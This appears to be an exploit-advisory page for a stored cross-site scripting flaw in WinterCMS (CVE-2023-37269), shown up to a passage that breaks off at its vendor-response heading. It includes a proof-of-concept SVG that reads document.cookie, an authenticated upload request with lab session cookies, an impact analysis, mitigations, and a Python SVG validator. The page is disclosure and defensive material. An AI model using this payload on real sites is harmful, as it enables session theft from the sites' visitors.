WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

Exploit Author: abhishek morla
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-15
# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: Windows 64-bit / Mozilla Firefox
# CVE : CVE-2023-37269
# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
# Video POC : https://youtu.be/Dqhq8rdrcqc

Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality

Description :
WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to persistent cross-site scripting (XSS). An attacker can embed JavaScript in an SVG file, which is then served to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger execution of the embedded script.

Payload:
// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

// POST request

POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

-----------------------------186411693022341939203410401206--



WinterCMS < 1.2.3: Persistent Cross-Site Scripting via SVG File Upload Vulnerability

WinterCMS, a popular open-source content management system built on Laravel, has recently come under scrutiny due to a critical security flaw identified in versions prior to 1.2.3. This vulnerability, tracked as CVE-2023-37269, exposes the platform to persistent cross-site scripting (XSS) attacks through a seemingly innocuous feature: the custom logo upload functionality.

Understanding the Vulnerability

At its core, this exploit leverages the lack of proper validation and sanitization when uploading SVG (Scalable Vector Graphics) files. While SVGs are widely used for logos and icons due to their scalability and resolution independence, they are also capable of embedding executable JavaScript code—making them a potent vector for malicious payloads.

Unlike traditional XSS attacks that are transient (e.g., reflected XSS), this vulnerability is persistent—meaning the malicious script remains on the server and executes every time the affected page is loaded, regardless of user authentication status. This makes it particularly dangerous for public-facing websites where anonymous visitors can be targeted.

Exploit Mechanism: How the Attack Works

An attacker with backend access uploads an SVG file containing embedded JavaScript. The server stores the file without filtering or sanitizing its content, so the script becomes part of the site's branding assets and is served from the site's own origin. One caveat on how it fires: browsers do not run scripts inside an SVG referenced from an <img> element; the script executes when the uploaded file is loaded as a document in its own right (opened directly at its URL, or embedded through <object>, <embed> or <iframe>), at which point it runs with access to the site's cookies and DOM, compromising any user who loads it.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
Explanation: This SVG file contains a simple JavaScript alert that triggers upon rendering. The <script> tag is embedded directly within the SVG document. When the browser loads this file as a logo, it executes the script—revealing the user's session cookies. In a real-world attack, this could be replaced with more sophisticated payloads such as:

  • Stealing session tokens or authentication cookies
  • Redirecting users to phishing sites
  • Injecting malicious scripts to manipulate DOM elements
  • Exfiltrating sensitive data via beacon requests

Attack Vector: Backend Branding Endpoint

The vulnerability is triggered through the /backend/system/settings/update/winter/backend/branding endpoint, which handles logo uploads via the formLogo::onUpload handler. This endpoint accepts multipart form data, including the SVG file as file_data.


POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

Key Observations: The request includes:

  • X-CSRF-TOKEN and the admin_auth cookie: the request is made from an authenticated backend session, so the attacker must be logged in as an admin
  • X-WINTER-REQUEST-HANDLER: specifies the handler function (formLogo::onUpload) responsible for processing the upload
  • Cookie: contains session tokens, which the malicious script could potentially steal

Since uploading a logo requires admin-level access, the attacker must already hold (or have compromised) a backend account. Once the malicious SVG is uploaded, however, it is served to every user, authenticated or not, which makes it a high-impact, persistent XSS threat.

Real-World Impact and Risks

Consider a scenario where a WinterCMS-based website hosts a public-facing blog or e-commerce platform. An attacker with admin credentials uploads a malicious SVG logo. Every visitor to the site, including anonymous users, may have their cookies exposed or be redirected to a malicious page. This could result in:

  • Session hijacking
  • Phishing attacks
  • Browser-based data exfiltration
  • Malware distribution via script injection

Because the script persists on the server, it remains active until the logo is removed or replaced—making it difficult to detect and remediate without active monitoring.

Security Recommendations and Mitigations

To prevent such vulnerabilities, developers and administrators should implement the following security controls:

  • Input Validation: Reject SVG files containing <script> tags or any executable content.
  • Content Sanitization: Strip or disable scripting elements during SVG processing.
  • File Type Restrictions: Limit uploads to safe formats (e.g., PNG, JPEG) and reject SVG unless strictly necessary.
  • Security Headers: Serve user-uploaded files with X-Content-Type-Options: nosniff and a restrictive Content-Security-Policy (for example script-src 'none' or the sandbox directive) so that an SVG opened directly cannot run script; nosniff alone does not stop a script inside an SVG that is served as image/svg+xml.
  • Automated Scanning: Integrate tools like SVG sanitizers or static analysis to detect embedded scripts.
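As an added example (not WinterCMS code), the following Python check implements the first two recommendations as a server-side gate that an upload handler could call before accepting a logo: it rejects script elements, event-handler attributes and javascript:/data: URLs. The function and constant names are my own; the malicious sample is the advisory's own payload, the clean sample is constructed.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that execute script or pull in external/active content.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "use"}
# Attributes whose values the browser treats as URLs.
URL_ATTRS = {"href", "{http://www.w3.org/1999/xlink}href"}
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.I)


def _local(name: str) -> str:
    """Strip the XML namespace from an element or attribute name."""
    return name.rsplit("}", 1)[-1]


def svg_violations(svg_bytes: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected (empty list = clean)."""
    # expat does not fetch the external DTD named in the DOCTYPE, so this runs offline.
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return [f"root element {root.tag!r} is not an SVG document"]
    problems = []
    for el in root.iter():
        name = _local(el.tag)
        if name in FORBIDDEN_TAGS:
            problems.append(f"forbidden element <{name}>")
        for attr, value in el.attrib.items():
            if _local(attr).lower().startswith("on"):  # onload, onclick, ...
                problems.append(f"event handler attribute {attr} on <{name}>")
            elif attr in URL_ATTRS and ACTIVE_SCHEME.match(value):
                problems.append(f"active URL scheme in {attr} on <{name}>")
    return problems


# The advisory's own payload (from this page) and a constructed benign logo.
MALICIOUS_LOGO = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert(document.cookie);</script>
</svg>"""
CLEAN_LOGO = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>'

if __name__ == "__main__":
    for label, data in (("malicious", MALICIOUS_LOGO), ("clean", CLEAN_LOGO)):
        print(f"{label}: {svg_violations(data) or 'accepted'}")
```

A rejection list is returned rather than a sanitized file on purpose: for a logo upload, refusing SVG (or any active content) is simpler to reason about than rewriting it.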

Vendor Response and Patching

The WinterCMS